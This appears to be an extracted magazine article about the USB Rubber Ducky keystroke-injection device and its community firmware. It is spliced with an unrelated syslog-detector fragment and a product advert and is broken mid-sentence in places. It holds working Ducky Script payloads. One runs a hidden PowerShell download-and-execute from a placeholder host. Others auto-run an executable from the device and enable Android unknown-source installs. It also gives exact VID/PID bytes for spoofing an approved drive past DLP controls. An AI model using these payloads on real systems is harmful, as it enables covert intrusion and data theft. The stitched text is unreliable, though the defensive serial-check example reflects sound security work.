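    for alert in detect_config_changes(SAMPLE_SYSLOG.splitlines(), ["192.168.100.0/24"]):
        print(alert["source"], alert["method"], "; ".join(alert["reasons"]))
```

Because the write happens through a spoofed source, the address in the log is the one the attacker chose, not the attacker's own; the useful signal is the SNMP method itself, which is why it alerts even when the address happens to fall inside the trusted range.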
Jason Nehrboss
The project was to process the popular Teensy HID Attacks. But there were two small problems with regards to the Teensy: programming and size. Some knowledge of C/C++ was needed to effectively program the device, and with the addition of the micro SD card reader the resultant hardware was rather bulky and ugly.
The solution was to create a custom/bespoke board that used a similar chipset that had the micro SD card reader built in. The aim was to fit everything into a standard USB case, making the Ducky a sleek little ninja. Thus, the Ducky became a smaller, lighter, and yet more powerful adversary.
Initially, the Ducky was limited to supporting only the Microsoft Windows OS and the US language/keyboard mapping. Suspicions were that this was a firmware related problem. But thanks to the developments of one community member, midnitesnake, the community has seen an influx of different language support (US, GB, FR, DE, NW, SW, RU, ES, PT, BR, BE) and a number of device firmwares: Keyboard, Mass Storage, and Composite Device (Keyboard & Mass Storage). The rise of the Ducky has seen the return of Auto-Run style attacks, as the injected keyboard payload can execute a file on the mass storage partition or even on another device.
No longer limited to the Microsoft Windows platform, midnitesnake has hacked the firmware so
that it can function on other OSs. The full list now includes:
Windows;
Mac OSX;
Linux;
BSD;
Solaris;
Other Unix based OSs;
Android;
iOS.
Hardware
them into HID control characters. The state machine manages the state of the keys (button down/button up) so the user does not have to worry about the complexity of the HID protocol, and the fact that every emulated keypress has to be dealt with twice: key down and key up. The Ducky's board may vary in color (depending on production runs), but essentially all current Duckies are Revision 2 (R2). An updated Revision 3 that should contain yet another more powerful chip, with more memory, possibly opening other attack possibilities, is currently in the concept phase.
Encoder
One key factor was to make a high-level scripting language that would be easy for the public to learn, in order to quickly develop interesting and effective payloads. The Hak5 Team constructed the first Ducky-Code, or rather Ducky Script. This took plain, simple English commands and keyboard identifiers and translated them into a series of two-byte codes: one byte for modifiers, such as shift, caps_lock, and others, and one byte for the actual key press (a, b, c ...). The Team wanted to create an open-source sub-program, the Encoder, that would address the need of converting the high level commands into these two-byte codes. The program had to function on any OS and for this reason Java was used to compile a program that would translate English instructions to the raw binary code (inject.bin) that the Ducky needed. The Encoder that comes delivered with the Ducky is Jason Applebaum's original version, which unfortunately works only on US languages. But read on...
When midnitesnake built the community firmware he decided to keep the current Encoder and the state machine (covered below), so that all code was backward compatible. He discovered that the initial language problems were in fact located in the Encoder.jar and not in the firmware. Using a USB sniffer, midnitesnake was able to determine the HID codes for additional keys, the secret behind multiple key presses (representing three keystrokes within two bytes) and the fact that HID codes would represent different characters on the keyboard depending on the selected language of the OS, effectively opening up the power of the Ducky to the whole world!
This second version of the encoder was published as open source on a Google Code website (http://ducky-decode.googlecode.com), initially only supporting US and GB keyboard mappings. Midnitesnake turned to the community to help fill in
Community Firmware
The stock firmware is a basic keyboard HID injection attack. This essentially means that the Ducky is behaving as an automatic keyboard, typing much faster than any human. The Ducky's speed is limited to the USB bus and the clock speed of the micro-controller. Still, it can type in seconds what would take the average human minutes.
The Ducky can quickly type on a machine that has briefly been left unlocked, or it can be used in brute-force attacks to compromise a login form or authorization request. In fact the Ducky can be used in any situation where a keyboard is normally used, even to aid in repetitive tasks. We will now look at a simple Ducky payload to demonstrate the simple nature of Ducky Script and how simple the Ducky is to program.
Creating an inject.bin
Copy the Sample Payload from Listing 1 and insert the text into any text editor (Notepad, Nano, Vi) and save to a file called sample.txt.
To run the encoder, you need to check if Java is installed on your machine. Open a command-line terminal with cmd.exe and type java -version; if you receive "command not found" it is possible that Java is not installed on your system. Visit http://java.com/en/download/index.jsp to download Java for your system.
Now to convert the sample.txt into an inject.bin, copy the command from Listing 2.
Alternatively, if you are not using an American configuration / language, you can switch languages by using the -l flag (see Listing 3).
Then simply copy the inject.bin over to the SD card (using a suitable adapter). Remove the SD card, and insert it into the Ducky's SD card reader. Plug the Ducky into a Windows computer and watch the payload open Notepad and write your test message.
If you want some ideas on creating some Ducky Script payloads, the community is maintaining a small list on the Hak5 GitHub repository https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads. Also, if you are more interested in attack vector payloads, visit https://code.google.com/p/simple-ducky-payload-generator/ for a collection of remote shells and social engineering type payloads.
DELAY 3000
WIN R
DELAY 100
STRING NOTEPAD
ENTER
STRING This is a Test. My First Ducky Payload!
ENTER
DELAY 3000
WIN R
DELAY 100
STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://example.com/exploit.txt','%TEMP%\exploit.exe'); Start-Process '%TEMP%\exploit.exe'
ENTER
access to the local network! Someone has inserted one of Bob's Duckies into their computer.
DLP Attacks
Shortly after discovering the answer to building different key-mappings without the need to alter the firmware, midnitesnake released a firmware that allowed the Ducky to function as a normal USB Mass Storage device. This was functional but slow; as the Ducky is open source, neither the manufacturer (Hak5) nor midnitesnake (community leader) could use the proprietary SDIO code that allows fast file transfers. Hence, the Ducky is limited to the maximum speed of the MMC data transfer rate of approximately 150KB/s. This firmware release was the initial stepping stone for the progression of the Composite Duck, nicknamed The Twin Duck.
However, there is an important part the Ducky can play. The firmware has been given the functionality to mimic a specific USB VID and PID from within a file stored on the micro SD card called vidpid.bin. This file is read by the microcontroller as power is initially supplied to the device, and the values contained within this file are used to manipulate the data on the Ducky's USB stack. When the OS starts to interrogate the device for the VID, PID, and class identifiers, this information is then supplied to the OS so the appropriate driver can be loaded. Any device control software (DLP solutions) which operates on white/black-lists can therefore be easily bypassed, as the Ducky can pretend to be an authorised device. For example, if an organisation only allowed encrypted Kingston DataTraveler USB drives, the Ducky would pretend to be a Kingston DataTraveler. The OS would correctly mount the drive, and the user is free to copy data to/from the device. This has been successfully demonstrated within the industry with organisations restricting the use of USB disk drives to a particular vendor that supplies encrypted drives. The Ducky is able to pretend to be an encrypted drive and can successfully be mounted. The file vidpid.bin can easily be altered by any hex editor software (Windows: HxD http://mh-nexus.de/en/hxd/, Linux: xxd, hexedit). The VID and PID are read as hexadecimal values and not ASCII. For example, to mimic the USB VID/PID of a Kingston DataTraveler set the first four bytes of the vidpid.bin file to:
09 51 16 00
Then, you need to save the file, unplug, and reinsert the Ducky. You should then find that the
05/2013 (24) August
TOOLS
OS will now identify the Ducky as a Kingston Data Traveler Drive. Since this development, Anti-Virus (AV) companies and other DLP vendors
have jumped onto the Ducky project in order to
research viable counter-measures. Currently, the
vendors have come up with the following solutions to stop Ducky DLP attacks:
Additionally using the USB serial number to
verify the device. Current Ducky firmware deListing 5. Windows Example Auto-run Attack Code in
Ducky Script
DELAY 3000
WIN R
DELAY 50
STRING CMD.EXE
ENTER
DELAY 100
STRING for /f %d in (wmic volume get driveletter^, label ^| findstr DUCKY) do set myd=%d
ENTER
DELAY 50
STRING %myd%\payload.exe
ENTER
STRING EXIT
ENTER
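As an added example (not the article's, Hak5's or midnitesnake's code) of why the serial-number check the vendors introduced matters: the script below decodes a constructed vidpid.bin image in the article's "09 51 16 00" format and evaluates the resulting device against a VID/PID-only allow-list and a VID/PID-plus-serial allow-list. The byte layout (big-endian VID then PID), the device records and every serial value are assumptions.

```python
# Added example (not from the article): decode a Ducky-style vidpid.bin and
# compare two USB device-control policies. Assumption: the first four bytes
# hold the 16-bit VID then PID, big-endian, as "09 51 16 00" -> 0x0951/0x1600
# implies. All device records and serial numbers below are constructed.
from __future__ import annotations
from dataclasses import dataclass
from typing import Tuple


def parse_vidpid(blob: bytes) -> Tuple[int, int]:
    """Return (vid, pid) from the first four bytes of a vidpid.bin image."""
    if len(blob) < 4:
        raise ValueError("vidpid.bin needs at least four bytes")
    return int.from_bytes(blob[0:2], "big"), int.from_bytes(blob[2:4], "big")


@dataclass(frozen=True)
class UsbDevice:
    vid: int
    pid: int
    serial: str  # the iSerialNumber string the device reports over USB


# Constructed allow-list of the organisation's issued encrypted drives:
# (vid, pid, serial); the serials are made-up placeholders.
ISSUED_DRIVES = {
    (0x0951, 0x1600, "DT-EXAMPLE-0001"),
    (0x0951, 0x1600, "DT-EXAMPLE-0002"),
}


def allowed_by_vidpid(dev: UsbDevice) -> bool:
    """Weak policy: trusts any device whose VID/PID pair is on the list."""
    return any(dev.vid == v and dev.pid == p for v, p, _ in ISSUED_DRIVES)


def allowed_by_vidpid_serial(dev: UsbDevice) -> bool:
    """Stronger policy (the vendor countermeasure the article mentions):
    the serial must also match an issued unit, so a cloned VID/PID alone
    does not get the device mounted."""
    return (dev.vid, dev.pid, dev.serial) in ISSUED_DRIVES


# Constructed vidpid.bin content matching the article's Kingston example.
SPOOF_IMAGE = bytes.fromhex("09511600")
vid, pid = parse_vidpid(SPOOF_IMAGE)
# Constructed: the spoofing device reports a serial that was never issued.
spoofed = UsbDevice(vid, pid, "NOT-AN-ISSUED-SERIAL")
genuine = UsbDevice(0x0951, 0x1600, "DT-EXAMPLE-0001")
```

The VID/PID-only policy accepts the spoofed device exactly as the article describes, while the serial-bound policy rejects it and still accepts the genuine drive.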
The Ducky has numerous alternative firmware images created by midnitesnake; the composite device (or c_duck_vXX.hex) is a combination of the Keyboard HID Emulation and the Mass Storage device. Now, the HID payload can directly reference the Drive/Partition of the sdcard mounted on the actual Ducky. This essentially brings back auto-run type attacks, as no interaction is needed from the user. The Ducky can type so fast that a small and simple payload is triggered within a flash!
The code shown in Listing 5 utilizes the power of the Windows Management Instrumentation Command-line (WMIC) to find the drive letter associated with the label DUCKY, then sets an environment variable to reference the drive. Then, the payload on the sdcard is executed through the use of the environment variable. No interaction is required from the user, other than possibly inserting the Ducky (in disguise as a normal USB Drive) into their computer. WMIC is only present in Windows, therefore the payload needs adapting for OSX or Linux systems (see Listings 6, 7).
Note: Timings may need to be adjusted depending on the speed of the system.
Hak5's Darren Kitchen was the first to test out midnitesnake's new firmware and found the Ducky would also function on the Android Platform. Darren successfully tested the firmware on the Galaxy Nexus/Note running Android version 4.2.1. Darren programmed a script that would utilize the power of the Ducky to unlock his phone within 24 hours. For this attack to work you will need a compatible USB (micro) On-The-Go (OTG) cable. With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you are looking at a best case scenario of exhausting the key space in about 16.6 hours. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee.
Page 64
iOS
Fuzzy Duck
attacking systems, applications, or end users, the Ducky can also be used as a tool to aid or even complement security. Just check out some of the scenarios below.
Listing 10. Android Payload Allow Program Installation from Unknown Sources
CTRL P
REM SELECT SECURITY
REM TOTAL 13 DOWNARROWS
DOWNARROW
REPEAT 12
REM SELECT UNKNOWN SOURCES
RIGHTARROW
ENTER
REM SAY OK TO THE POPUP MESSAGE
RIGHTARROW
ENTER
Passwords
On The Web
Glossary
AV: Anti-Virus;
DLP: Data Loss Prevention;
EP: End-Point;
HID: Human Interface Device;
KB: Kilo-Byte (1024 Bytes);
MSC: Mass Storage Class;
OS: Operating System;
OTG: On-The-Go;
PID: Product Identifier;
PIN: Personal Identification Number;
PoC: Proof of Concept;
UDC: USB Device Controller;
UDI: USB Device Interface;
USB: Universal Serial Bus;
VID: Vendor Identifier;
WMIC: Windows Management Instrumentation Command-line.
MIDNITESNAKE
UPDATE: NOW WITH STIG AUDITING
Cisco Systems Inc.: "In some cases Nipper Studio has virtually removed the need for a manual audit."
Titania's award winning Nipper Studio configuration auditing tool is helping security consultants and end-user organizations worldwide improve their network security. Its reports are more detailed than those typically produced by scanners, enabling you to maintain a higher level of vulnerability analysis in the intervals between penetration tests.
Now used in over 45 countries, Nipper Studio provides a thorough, fast & cost effective way to securely audit over 100 different types of network device. The NSA, FBI, DoD & U.S. Treasury already use it, so why not try it for free at www.titania.com
✓ Ensure resilience
✓ Mitigate risk